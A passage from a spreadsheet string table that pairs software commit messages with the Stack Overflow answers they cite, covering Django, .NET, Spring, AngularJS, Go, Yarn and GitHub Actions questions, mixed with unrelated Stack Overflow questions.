    at java.base/java.lang.Thread.run(Thread.java:840)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C48</t>
  </si>
  <si>
    <t>DestroyModelMixin should call serializer method to remove model, not instance directly #5287
I prefer to keep domain logic out of my views and models. So, I tend do it in my serializers, often delegating to a "service module", as recommended by this popular SO answser: https://stackoverflow.com/a/12857584/1807888</t>
  </si>
  <si>
    <t>It seems like you are asking about the difference between the data model and the domain model – the latter is where you can find the business logic and entities as perceived by your end user, the former is where you actually store your data.
Furthermore, I've interpreted the 3rd part of your question as: how to notice failure to keep these models separate.
These are two very different concepts and it's always hard to keep them separate. However, there are some common patterns and tools that can be used for this purpose.
About the Domain Model
The first thing you need to recognize is that your domain model is not really about data; it is about actions and questions such as "activate this user", "deactivate this user", "which users are currently activated?", and "what is this user's name?". In classical terms: it's about queries and commands.
Thinking in Commands
Let's start by looking at the commands in your example: "activate this user" and "deactivate this user". The nice thing about commands is that they can easily be expressed by small given-when-then scenario's:
given an inactive user  when the admin activates this user  then the user becomes active  and a confirmation e-mail is sent to the user  and an entry is added to the system log (etc. etc.)
Such scenario's are useful to see how different parts of your infrastructure can be affected by a single command – in this case your database (some kind of 'active' flag), your mail server, your system log, etc.
Such scenario's also really help you in setting up a Test Driven Development environment.
And finally, thinking in commands really helps you create a task-oriented application. Your users will appreciate this :-)
Expressing Commands
Django provides two easy ways of expressing commands; they are both valid options and it is not unusual to mix the two approaches.
The service layer
The service module has already been described by @Hedde. Here you define a separate module and each command is represented as a function.
services.py
def activate_user(user_id):
    user = User.objects.get(pk=user_id)
    # set active flag
    user.active = True
    user.save()
    # mail user
    send_mail(...)
    # etc etc
Using forms
The other way is to use a Django Form for each command. I prefer this approach, because it combines multiple closely related aspects:
execution of the command (what does it do?)
validation of the command parameters (can it do this?)
presentation of the command (how can I do this?)
forms.py
class ActivateUserForm(forms.Form):
    user_id = IntegerField(widget = UsernameSelectWidget, verbose_name="Select a user to activate")
    # the username select widget is not a standard Django widget, I just made it up
    def clean_user_id(self):
        user_id = self.cleaned_data['user_id']
        if User.objects.get(pk=user_id).active:
            raise ValidationError("This user cannot be activated")
        # you can also check authorizations etc. 
        return user_id
    def execute(self):
        """
        This is not a standard method in the forms API; it is intended to replace the 
        'extract-data-from-form-in-view-and-do-stuff' pattern by a more testable pattern. 
        """
        user_id = self.cleaned_data['user_id']
        user = User.objects.get(pk=user_id)
        # set active flag
        user.active = True
        user.save()
        # mail user
        send_mail(...)
        # etc etc
Thinking in Queries
You example did not contain any queries, so I took the liberty of making up a few useful queries. I prefer to use the term "question", but queries is the classical terminology. Interesting queries are: "What is the name of this user?", "Can this user log in?", "Show me a list of deactivated users", and "What is the geographical distribution of deactivated users?"
Before embarking on answering these queries, you should always ask yourself this question, is this:
a presentational query just for my templates, and/or
a business logic query tied to executing my commands, and/or
a reporting query.
Presentational queries are merely made to improve the user interface. The answers to business logic queries directly affect the execution of your commands. Reporting queries are merely for analytical purposes and have looser time constraints. These categories are not mutually exclusive.
The other question is: "do I have complete control over the answers?" For example, when querying the user's name (in this context)  we do not have any control over the outcome, because we rely on an external API.
Making Queries
The most basic query in Django is the use of the Manager object:
User.objects.filter(active=True)
Of course, this only works if the data is actually represented in your data model. This is not always the case. In those cases, you can consider the options below.
Custom tags and filters
The first alternative is useful for queries that are merely presentational: custom tags and template filters.
template.html
&lt;h1&gt;Welcome, {{ user|friendly_name }}&lt;/h1&gt;
template_tags.py
@register.filter
def friendly_name(user):
    return remote_api.get_cached_name(user.id)
Query methods
If your query is not merely presentational, you could add queries to your services.py (if you are using that), or introduce a queries.py module:
queries.py
def inactive_users():
    return User.objects.filter(active=False)
def users_called_publysher():
    for user in User.objects.all():
        if remote_api.get_cached_name(user.id) == "publysher":
            yield user 
Proxy models
Proxy models are very useful in the context of business logic and reporting. You basically define an enhanced subset of your model. You can override a Manager’s base QuerySet by overriding the Manager.get_queryset() method.
models.py
class InactiveUserManager(models.Manager):
    def get_queryset(self):
        query_set = super(InactiveUserManager, self).get_queryset()
        return query_set.filter(active=False)
class InactiveUser(User):
    """
    &gt;&gt;&gt; for user in InactiveUser.objects.all():
            assert user.active is False 
    """
    objects = InactiveUserManager()
    class Meta:
        proxy = True
Query models
For queries that are inherently complex, but are executed quite often, there is the possibility of query models. A query model is a form of denormalization where relevant data for a single query is stored in a separate model. The trick of course is to keep the denormalized model in sync with the primary model. Query models can only be used if changes are entirely under your control.
models.py
class InactiveUserDistribution(models.Model):
    country = CharField(max_length=200)
    inactive_user_count = IntegerField(default=0)
The first option is to update these models in your commands. This is very useful if these models are only changed by one or two commands.
forms.py
class ActivateUserForm(forms.Form):
    # see above
    def execute(self):
        # see above
        query_model = InactiveUserDistribution.objects.get_or_create(country=user.country)
        query_model.inactive_user_count -= 1
        query_model.save()
A better option would be to use custom signals. These signals are of course emitted by your commands. Signals have the advantage that you can keep multiple query models in sync with your original model. Furthermore, signal processing can be offloaded to background tasks, using Celery or similar frameworks.
signals.py
user_activated = Signal(providing_args = ['user'])
user_deactivated = Signal(providing_args = ['user'])
forms.py
class ActivateUserForm(forms.Form):
    # see above
    def execute(self):
        # see above
        user_activated.send_robust(sender=self, user=user)
models.py
class InactiveUserDistribution(models.Model):
    # see above
@receiver(user_activated)
def on_user_activated(sender, **kwargs):
        user = kwargs['user']
        query_model = InactiveUserDistribution.objects.get_or_create(country=user.country)
        query_model.inactive_user_count -= 1
        query_model.save()
Keeping it clean
When using this approach, it becomes ridiculously easy to determine if your code stays clean. Just follow these guidelines:
Does my model contain methods that do more than managing database state? You should extract a command.
Does my model contain properties that do not map to database fields? You should extract a query.
Does my model reference infrastructure that is not my database (such as mail)? You should extract a command.
The same goes for views (because views often suffer from the same problem).
Does my view actively manage database models? You should extract a command.
Some References
Django documentation: proxy models
Django documentation: signals
Architecture: Domain Driven Design</t>
  </si>
  <si>
    <t xml:space="preserve">I've created a simple desktop application in C# 3.0 to learn some C#, wpf and .Net 3.5.
My application essentially reads data from a csv file and stores it in a SQL server CE database. I use sqlmetal to generate the ORM code for the database.
My first iteration of this app is ugly as hell and I'm in the process of refactoring it.
Which brings me to my question. How would you architect a desktop database app in C#?
What are the best practices?
Do you create a Database Abstraction Layer (DAL) which uses the sqlmetal generated code? Or is the generated code enough of an abstraction?
If you use DAL pattern, do you make it a singleton or a static member?
Do you use the View-Model-ModelView pattern with the DAL pattern?
Apologies if this seems like a long open ended question, but I have been giving this a lot of thought recently.
I see a lot of examples on how to architect an enterprise n-tier app in C# but not that many on architecting standalone desktop apps.
</t>
  </si>
  <si>
    <t>C480</t>
  </si>
  <si>
    <t>Added Web UI
Created new MVC NET Framework 4.7.2 project without preconfigured Identity, which uses existing TRMDesktopUI.Library to access the API (user authentication and endpoints).
NET 4.xx does not support DI natively, therefore used Ninject to provide compability (Singleton for ApiHelper).
Considerated also HttpClientFactory extension (native for Net Core)
https://stackoverflow.com/questions/51498896/use-httpclientfactory-from-net-4-6-2</t>
  </si>
  <si>
    <t xml:space="preserve">While fleshing out a hypothetical domain model, I have found myself wondering whether the better approach in relating domain objects would be to have a parent domain object contain a pointer (the identifier of the child) or if it would be a better approach to use the child objects to build a composite within the parent object.
I can see the pros and cons of each approach, mostly a trade off of size versus complexity, being what it boils down to.  I would tend to lean more towards a identifier relationship approach, as I am not anticipating the need for doing any sort of lazy loading.
Although not directly related, the domain objects are simple POCOs (.NET-equivalent of POJOs).  They are explicitly marked as serializable, as there is a good chance that they will eventually cross between application domains.  LINQ makes the relational identifier approach viable, in my opinion, and I would not consider it at all if LINQ were not available.
Any thoughts would be appreciated!
Edit: A couple of more thoughts that might have me lean towards an identifier-only approach.  First would be that the caching policy of the objects.  It is entirely possible that a parent and child object have different TTLs, as defined by their policies.  The second would be that the reference holding might limit object reuse, in that the same child might be held by multiple parents - in the case of reusable data.  Both of these also relate to the overall size of the serialized objects, as well.
</t>
  </si>
  <si>
    <t>All of the Microsoft.Extensions.* packages target .NET Standard 2.0. That means that you can use Dependency Injection, Configuration, Logging and HttpClientFactory if you add the appropriate package to your application.
You need to add Microsoft.Extensions.Http to use HttpClientFactory and Microsoft.Extensions.Http.Polly if you want to use it with Polly
To configure HttpClientFactory you'll have to add Microsoft.Extensions.DependencyInjection to your "main" project. Microsoft.Extensions.Http package only depends on Microsoft.Extensions.DependencyInjection.Abstractions which contains the interfaces, not the DI provider itself.</t>
  </si>
  <si>
    <t>C481</t>
  </si>
  <si>
    <t>Added first controller
Fixed thanks to
http://stackoverflow.com/questions/25330193/angularjs-asp-net-mvc-controller-undefined/25330617#25330617</t>
  </si>
  <si>
    <t>As you suspected, since you are using angular 1.3 beta
which has no implicit support for Global controller constructor function discovery
, you need to register your controller with the module.
angular.module('yourApp').controller('FirstCtrl',['$scope', FirstCtrl]);
and also since you are defining an module you need to specify the module name in your ng-app.
&lt;html ng-app="yourApp"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a relatively terse way to force scientific notation display in the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;q)1000000000*25
25000000000
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I.e., to instead return a scientific formatted value, as in:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;q)1e9*25
2.5e+10
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;without having to use any scientifically notated arguments?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C482</t>
  </si>
  <si>
    <t>Attempt to resolver security trust issues
http://stackoverflow.com/questions/34418477/mvc-website-on-a-shared-hosting-environment-with-restricted-trust</t>
  </si>
  <si>
    <t>We forget to mark that class with the correct attribute, which now causes this exception. Since Microsoft has deprecated partial trust in ASP.NET web applications, we (the Simple Injector contributors) will probably not invest in this area as well. In other words, don't expect us to fix the bug (soon).
To solve this issue, implement your own
SimpleInjectorDependencyResolver
. Doing this is trivial; it's just a few lines of code that you can copy from Simple Injector's
source code
.</t>
  </si>
  <si>
    <t xml:space="preserve">If you design a distributed application for easy scale-out, or you just want to make use of any of the new â€œcloud computingâ€ offerings by Amazon, Google or Microsoft, there are some typical concepts or components you usually end up using:
distributed blob storage (aka S3)
asynchronous, durable message queues (aka SQS) 
non-Relational-/non-transactional databases (like SimpleDB, Google BigTable, Azure SQL Services)
distributed background worker pool
load-balanced, edge-service processes handling user requests (often virtualized)
distributed caches (like memcached)
CDN (content delivery network like Akamai)
Now when it comes to design and sketch an architecture that makes use of such patterns, are there any commonly used symbols I could use? Or even a download with some cool Visio stencils? :)
It doesnâ€™t have to be a formal system like UML but I think it would be great if there were symbols that everyone knows and understands, like we have commonly used shapes for databases or a documents, for example. I think it would be important to not mix it up with traditional concepts like a normal file system (local or network server/SAN), or a relational database. 
Simply speaking, I want to be able to draw some conclusions about an applicationâ€™s scalability or data consistency issues by just looking at the system architecture overview diagram.
Update: Thank you very much for your answers. I like the idea of putting a small "cloud symbol" on the traditional symbols. However I leave this thread open just in case someone will find specific symbols (maybe in a book or so) - or uploaded some pimped up Visio stencils ;)
</t>
  </si>
  <si>
    <t>C483</t>
  </si>
  <si>
    <t>add demo project for SPR-10655
See
https://stackoverflow.com/questions/27065305/spring-mvc-interceptor-does-not-execute-for-resource-handler-urls</t>
  </si>
  <si>
    <t>Update: As of Spring Framework 5.0.1 (and SPR-16034), interceptors are automatically mapped on ResourceHttpRequestHandler by default.
I think the configured interceptors aren't mappped on the resource handler, but on the one handling @RequestMapping requests.
Maybe try this instead?
@EnableWebMvc //equivalent to mvc:annotation-driven
@Configuration 
@PropertySource("classpath:configuration.properties") 
public class WebConfig extends WebMvcConfigurerAdapter {
    @Inject
    private TimingInterceptor timingInterceptor;
    @Inject
    private CORSHeaders corsHeaders;
    // equivalent to mvc:resources
    @Override
    public void addResourceHandlers(ResourceHandlerRegistry registry) {
        registry.addResourceHandler("/resources/**").addResourceLocations("/resources/");
    }
    @Bean
    public MappedInterceptor timingInterceptor() {
        return new MappedInterceptor(new String[] { "/**" }, timingInterceptor);
    }
    @Bean
    public MappedInterceptor corsHeaders() {
        return new MappedInterceptor(new String[] { "/**" }, corsHeaders);
    }
}
This should be better documented with SPR-10655.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I upgraded to 0.2.54 and am still having trouble getting finance to work.&lt;/p&gt;
&lt;p&gt;Code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;the_ticker = yf.Ticker(&amp;quot;MSFT&amp;quot;)
ticker_finfo = the_ticker.news
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;During debugging if I pause after the first line and then hover the mouse over the_ticker I get a bunch of 'Empty DataFrame'. for example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;     balance_sheet = Empty DataFrame
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I let the second line run, 'ticker_finfo = the_ticker.news', I get:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;     error = JSONDecodeError('Expecting value: line 1 column 1 (char 0)')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Further into the error object for the second line, there is also the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;doc = 'Edge: Too Many Requests'
msg = 'Expecting value'
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Please help! Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C484</t>
  </si>
  <si>
    <t>Create ActionLinkEx.cs
http://stackoverflow.com/questions/717690/asp-net-mvc-pass-array-object-as-a-route-value-within-html-actionlink</t>
  </si>
  <si>
    <t>Try creating a RouteValueDictionary holding your values.  You'll have to give each entry a different key.
&lt;%  var rv = new RouteValueDictionary();
    var strings = GetStringArray();
    for (int i = 0; i &lt; strings.Length; ++i)
    {
        rv["str[" + i + "]"] = strings[i];
    }
 %&gt;
&lt;%= Html.ActionLink( "Link", "Action", "Controller", rv, null ) %&gt;
will give you a link like
&lt;a href='/Controller/Action?str=val0&amp;str=val1&amp;...'&gt;Link&lt;/a&gt;
EDIT
: MVC2 changed the ValueProvider interface to make my original answer obsolete.  You should use a model with an array of strings as a property.
public class Model
{
    public string Str[] { get; set; }
}
Then the model binder will populate your model with the values that you pass in the URL.
public ActionResult Action( Model model )
{
    var str0 = model.Str[0];
}</t>
  </si>
  <si>
    <t xml:space="preserve">For desktop programmers, do you avoid deploying .NET 3.5 framework on client machines for its [external-link]?  If so, is [external-link] feature-complete?
[EDIT]
.NET 3.5 Framework evokes a feeling of OLE 2.0 (aka COM).  When 2.0 newly came out, some users then are asking if there will be OLE version 3.0.  But there will be none.  OLE 2.0 is a solid architecture where all future improvements can be made without touching the underlying architecture.  
I think the same of .NET Framework 2.0's CLR as a solid architecture, which there will be no need to change the underlying architecture to accomodate future improvements.  .NET 3.5 was shipped without needing to change its underlying CLR(2.0).  If Microsoft can improve .NET (5.0) without making changes to underlying architecture (CLR 2.0), it is a proof that CLR 2.0 has a sound foundation right from the start, kudos to them.
The same cannot be said of JVM, its foundation is flawed.  Their generics cannot get first-class support from its VM/CLR.
That being said, .NET 3.5 is just extra libraries, where some functionalities I don't need, some I can happily swapped with(e.g. LINQBridge).  The rest are just [external-link](doesn't depend on 3.5).  Can still continue using VS 2008, targeting .NET 2.0 (only 20 MB), yet can still get the neat features: lambda,extension methods,inferred variable,anonymous types,automatic properties,etc.
</t>
  </si>
  <si>
    <t>C485</t>
  </si>
  <si>
    <t>add a view that display the ViewBag message of the Action Register an
d then redirect the user back to Index
https://stackoverflow.com/questions/24700208/mvc-redirect-to-another-page-after-a-four-second-pause</t>
  </si>
  <si>
    <t>You wont be able to do that on the server side, you'll have to use javascript. You can use
window.setTimeout(function(){
window.location.href='your URL';
}, 4000);</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using the following request to search for drive items in the C# SDK:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var queryOptions = new List&amp;lt;QueryOption&amp;gt;()
                       {
                           new QueryOption(&amp;quot;select&amp;quot;, &amp;quot;name,id,webUrl,webDavUrl,parentReference,thumbnails&amp;quot;)
                       };
searchItems = await _graphServiceClient.Me.Drives[DriveID].Root
                            .ItemWithPath(PathOrDriveItemID)
                            .Search(SearchItem)
                            .Request(queryOptions)
                            .GetAsync();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;DriveItem&lt;/code&gt; has a thumbnail option but I cannot seem to get the values via this request by setting the &lt;code&gt;queryOptions&lt;/code&gt;. Is it not possible?&lt;/p&gt;
&lt;p&gt;I am able to do this request separately to get the thumbnail but I want to reduce it to one call if possible:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;response = await _graphServiceClient.Me.Drives[DriveID].Root
                       .ItemWithPath(PathOrDriveItemID).Thumbnails
                       .Request()
                       .GetAsync();
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C486</t>
  </si>
  <si>
    <t>Set Close to true on the http client request to avoid EOF errors.
This can happen if go tends to reuse the connection to the host
automatically, but there seems to be a bug in the go library
leading to EOF errors.
Setting Close to true avoids reuse and immediately closes the connection
with the host.
For more information, see
https://stackoverflow.com/questions/17714494/golang-http-request-results-in-eof-errors-when-making-multiple-requests-successi.</t>
  </si>
  <si>
    <t>I'm going to guess there is no problem with your code. The most likely cause of your problem is because the server is closing the connection. Rate limiting is one possible reason for this.
Your test shouldn't be relying on an external service that's very brittle and not hermetic. Instead you should think about spinning up a test server locally.</t>
  </si>
  <si>
    <t xml:space="preserve">Does anyone have a process or approach to use for determining how to resove a many-to-many relationship in a relational database?  Here is my scenario.  I have a group of contacts and a group of phone numbers.  Each contact can be associated with multiple phone numbers and each phone number can be associated with multiple contacts.
A simple example of this situation would be an office with two employess (e1 &amp; e2), one main voice line (v1), one private voice line (v2).  e1 is the CEO so they have thier own private voice line, v1, but they can also be reached by calling the main line, v2, and asking for the CEO.  e2 is just an employee and can only be reached by calling v2.
So, e1 should be related to v1 &amp; v2.  e2 should be related to v2. Conversly, v1 should be related to e1 and v2 should be related to e1 &amp; e2.
The goal here is to ge able to run queries like "what numbers can e1 be reached at" and "what employees can be reached at v2", etc..  I know the answer will involve an intermediate table or tables but I just can't seem to nail down the exact architecture.
</t>
  </si>
  <si>
    <t>C487</t>
  </si>
  <si>
    <t>Enable GitHub Actions Yarn Caching (#1332)
Summary:
We sometimes see workflows fail due to network flakiness, almost always being Windows agents doing a `yarn install`. This change enables storing and reusing Yarn's package cache, and makes `yarn install` more permissive when it does hit the network. https://stackoverflow.com/questions/51508364/yarn-there-appears-to-be-trouble-with-your-network-connection-retrying
Pull Request resolved: #1332
Test Plan: Workflows succeed, and we see cache being restored before yarn install step.
Reviewed By: lunaleaps
Differential Revision: D48967590
Pulled By: NickGerleman
fbshipit-source-id: 55ce6f05496f014512e0153b6646a7ca0ab964d9</t>
  </si>
  <si>
    <t>This happens when your network is too slow or the package being installed is too large, and Yarn just assumes it's a network problem.
Try increasing Yarn network timeout:
yarn add &lt;yourPackage&gt; --network-timeout 100000</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I vertically center the text in the Detail Lines using QuestPDF in Blazor?&lt;/p&gt;
&lt;p&gt;In the code below I am using .AlignMiddle() but it has no effect.&lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/52k5AaHO.png" rel="nofollow noreferrer"&gt;&lt;img src="https://i.sstatic.net/52k5AaHO.png" alt="QuestPDF" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;foreach (var detail in LstGenDetails)
{
                table.Cell().Element(container =&amp;gt;
                    container.PaddingVertical(15)
                        .BorderBottom(1)
                        .BorderColor(Colors.Grey.Lighten2)
                        .AlignMiddle()
                ).Text(detail.WasteClass);
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C488</t>
  </si>
  <si>
    <t>Fix GitHub token integration
Prior way of passing the GitHub token required for
making Git CLI commands did not work, with the
execution throwing the error:
```
Error:
/home/runner/work/openapi-github-pages-action/openapi-github-pages-action/./action.yml
(Line: 55, Col: 19): Unrecognized named-value: 'secrets'. Located at
position 1 within expression: secrets.GITHUB_TOKEN
```
As per
https://stackoverflow.com/questions/69493352/error-passing-secret-to-reusable-workflow
and
https://docs.github.com/en/actions/security-guides/automatic-token-authentication#about-the-github_token-secret,
it looks like when referencing secrets.GITHUB_TOKEN, the caller also
needs to specify that they're passing the token to you, which is
an additional user-required config and point for error.
We can instead directly reference github.token which only needs</t>
  </si>
  <si>
    <t>The caller had secrets under "with", should be under "secrets"
Calls Workflow
...
jobs:
  call-workflow:
    uses: dhis2-sre/gha-workflows/.github/workflows/
[email protected]
with:
      DOCKER_IMAGE_NAME: dhis2/instance-manager-api
      PROCESS_NAME: dhis2-instance-manager
    secrets:
      DOCKER_USERNAME: "${{ secrets.DOCKER_USERNAME }}"
      DOCKER_PASSWORD: "${{ secrets.DOCKER_PASSWORD }}"
      SOPS_KMS_ARN: "${{ secrets.SOPS_KMS_ARN }}"
      AWS_ACCESS_KEY_ID: "${{ secrets.AWS_ACCESS_KEY_ID }}"
      AWS_SECRET_ACCESS_KEY: "${{ secrets.AWS_SECRET_ACCESS_KEY }}"
      KUBECONFIG: "${{ secrets.KUBECONFIG }}"
Called Workflow
...
on:
  workflow_call:
    secrets:
      DOCKER_USERNAME:
        required: true
        description: ''</t>
  </si>
  <si>
    <t xml:space="preserve">I'm hoping to find an open source .net common library, but I'm having a hard time finding one.
What I'm looking for a is something that contains : Logging, Caching, String Manipulation, Config Reading, ext?!?.
Do you know if anything like this exists or is this more likely something that I will need to create myself?
</t>
  </si>
  <si>
    <t>C489</t>
  </si>
  <si>
    <t>Forward requests to Angular from Spring boot.
Added Spring MVC controller class with request mapping method to forward requests to Angular from Spring boot.
See example: https://stackoverflow.com/a/38778129</t>
  </si>
  <si>
    <t>I have a solution for you, you can add a
ViewController
to forward requests to Angular from Spring boot.
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
@Controller
public class ViewController {
@RequestMapping({ "/bikes", "/milages", "/gallery", "/tracks", "/tracks/{id:\\w+}", "/location", "/about", "/tests","/tests/new","/tests/**","/questions","/answers" })
   public String index() {
       return "forward:/index.html";
   }
}
here I have redirected all my angular2 ("/bikes", "/milages", "/gallery", "/tracks", "/tracks/{id:\w+}", "/location", "/about", "/tests","/tests/new","/tests/**","/questions","/answers")  to my SPA
You can do the same for your preject and you can also redirect your 404 error page to the index page as a further step.
Enjoy!</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;&lt;strong&gt;Question:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I have a React component in &lt;strong&gt;Package A&lt;/strong&gt; that contains business logic and UI hooks, running on the &lt;strong&gt;Cloudscape Design System&lt;/strong&gt;. This component is consumed by &lt;strong&gt;Package B&lt;/strong&gt; (also Cloudscape). Now, I need to reuse this component &lt;strong&gt;package A&lt;/strong&gt; in a new package &lt;strong&gt;C&lt;/strong&gt; but with a different design system (Material Design) while keeping the component logic unchanged.&lt;/p&gt;
&lt;h3&gt;Whatâ€™s the best way to achieve this?&lt;/h3&gt;
&lt;h4&gt;Potential Options:&lt;/h4&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;Mapping Helper&lt;/strong&gt;&lt;br /&gt;
Create a mapping helper that maps component props and transforms Cloudscape components to Material components at runtime.&lt;br /&gt;
Example:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;export const useDesignSystem = () =&amp;gt; {
  const { designSystem } = useContext(DesignSystemContext);
  const config = designSystem === 'cloudscape' ? cloudscapeConfig : materialConfig;
  const getComponent = (name) =&amp;gt; config.components[name];
  const mapProps = (name, props) =&amp;gt; {
    return { ...config.propMappers[name](props), ...config.styles[name] };
  };
  return { getComponent, mapProps };
};
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;li&gt;&lt;p&gt;&lt;strong&gt;HOC for Runtime Transformation&lt;/strong&gt;&lt;br /&gt;
Create a higher-order component (HOC) that wraps and transforms all components from Cloudscape to Material at runtime.&lt;br /&gt;
Example:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;const CloudscapeToMaterialWrapper = ({ children }) =&amp;gt; {
  return React.Children.map(children, (child) =&amp;gt; {
    const MUIComponent = componentMappings[child.type];
    if (MUIComponent) {
      const newProps = mapProps(child.type.name, child.props);
      return &amp;lt;MUIComponent {...newProps} /&amp;gt;;
    }
    return child;
  });
};
&lt;/code&gt;&lt;/pre&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;hr /&gt;
&lt;p&gt;Which approach is more efficient or maintainable for transforming design systems while keeping the component logic intact across different packages?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C49</t>
  </si>
  <si>
    <t>prevent multiple login
http://stackoverflow.com/questions/1932091/prevent-multiple-login-using-the-same-user-name-and-password</t>
  </si>
  <si>
    <t>If user close the browser without logout.
Particularly this case is hard and not reliable to detect. You could use the beforeunload event in Javascript, but you're fully dependent on whether the browser has JS enabled and the particular browser supports this non-standard event (e.g. Opera doesn't). That's also one of the major reasons that I'd suggest to just logout the previously logged in user instead of preventing the login. That's also more user-friendly and secure for the case that the user "forgot" to logout from the other computer.
Easiest way is to let the User have a static Map&lt;User, HttpSession&gt; variable and let it implement HttpSessionBindingListener (and Object#equals() and Object#hashCode()).
public class User implements HttpSessionBindingListener {
    // All logins.
    private static Map&lt;User, HttpSession&gt; logins = new HashMap&lt;User, HttpSession&gt;();
    // Normal properties.
    private Long id;
    private String username;
    // Etc.. Of course with public getters+setters.
    @Override
    public boolean equals(Object other) {
        return (other instanceof User) &amp;&amp; (id != null) ? id.equals(((User) other).id) : (other == this);
    }
    @Override
    public int hashCode() {
        return (id != null) ? (this.getClass().hashCode() + id.hashCode()) : super.hashCode();
    }
    @Override
    public void valueBound(HttpSessionBindingEvent event) {
        HttpSession session = logins.remove(this);
        if (session != null) {
            session.invalidate();
        }
        logins.put(this, event.getSession());
    }
    @Override
    public void valueUnbound(HttpSessionBindingEvent event) {
        logins.remove(this);
    }
}
When you login the User as follows:
User user = userDAO.find(username, password);
if (user != null) {
    request.getSession.setAttribute("user", user);
} else {
    // Show error.
}
then it will invoke the valueBound() which will remove any previously logged in user from the logins map and invalidate the session.
When you logout the User as follows:
request.getSession().removeAttribute("user");
or when the session is timed out, then the valueUnbound() will be invoked which removes the user from the logins map.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a dictionary of lists, each with a key string value (stock ticker) and value consisting of a list of dicts which looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;data
Out[88]: 
{'NVDA': [{'open': 144.75, 'high': 144.21, 'low': 174.33, 'close': 210.47},
  {'open': 123.97, 'high': 128.5, 'low': 110.25, 'close': 154.09},
  {'open': 118.19, 'high': 134.81, 'low': 104.37, 'close': 149.72},
  {'open': 225.35, 'high': 126.81, 'low': 104.77, 'close': 209.46},
  {'open': 247.2, 'high': 243.25, 'low': 220.44, 'close': 186.01}],
 'MSFT': [{'open': 175.78, 'high': 213.98, 'low': 229.75, 'close': 206.59},
  {'open': 142.98, 'high': 168.42, 'low': 188.33, 'close': 232.52},
  {'open': 184.14, 'high': 163.42, 'low': 194.81, 'close': 153.03},
  {'open': 199.54, 'high': 130.26, 'low': 101.05, 'close': 102.1},
  {'open': 243.91, 'high': 119.21, 'low': 190.2, 'close': 223.31}],
 'AAPL': [{'open': 202.06, 'high': 162.54, 'low': 212.3, 'close': 226.78},
  {'open': 191.17, 'high': 153.49, 'low': 135.13, 'close': 151.83},
  {'open': 187.15, 'high': 149.75, 'low': 123.28, 'close': 247.32},
  {'open': 194.29, 'high': 175.34, 'low': 244.14, 'close': 207.45},
  {'open': 228.9, 'high': 133.26, 'low': 100.59, 'close': 129.35}]}
ticks = ['NVDA', 'MSFT', 'AAPL']
data = {}
for s in ticks:
    data[s] = []
    for _ in range(5):
        entry = {
            'open': round(random.uniform(100, 250), 2),
            'high': round(random.uniform(100, 250), 2),
            'low': round(random.uniform(100, 250), 2),
            'close': round(random.uniform(100, 250), 2)
        }
        data[s].append(entry)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'd like to convert this to a dataframe which looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;df
Out[98]: 
    tick    open    high     low   close
0   NVDA  215.44  124.29  121.61  244.35
1   NVDA  214.89  184.49  157.39  239.31
2   NVDA  221.42  204.17  148.83  215.00
3   NVDA  182.49  104.29  175.36  226.59
4   NVDA  127.31  182.31  228.92  173.52
5   MSFT  217.79  147.98  120.40  239.97
6   MSFT  108.66  222.83  177.20  172.62
7   MSFT  138.16  116.36  241.62  231.15
8   MSFT  160.53  234.88  154.93  127.49
9   MSFT  168.22  127.77  224.75  207.59
10  AAPL  119.95  106.36  150.28  195.93
11  AAPL  117.71  142.54  210.08  116.37
12  AAPL  147.07  204.46  223.98  104.91
13  AAPL  135.71  211.83  210.11  102.34
14  AAPL  216.45  136.08  130.27  236.48
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C490</t>
  </si>
  <si>
    <t>Added a filter with the name PreventDuplicateRequest to prevent visit
ors from spamming the create button. i found it here ----&gt;https://stackoverflow.com/questions/4250604/how-do-i-prevent-multiple-form-submission-in-net-mvc-without-using-javascript</t>
  </si>
  <si>
    <t>Dont reinvent the wheel :)
Use the
Post/Redirect/Get
design pattern.
Here you can find a
question
and an answer giving some suggestions on how to implement it in ASP.NET MVC.</t>
  </si>
  <si>
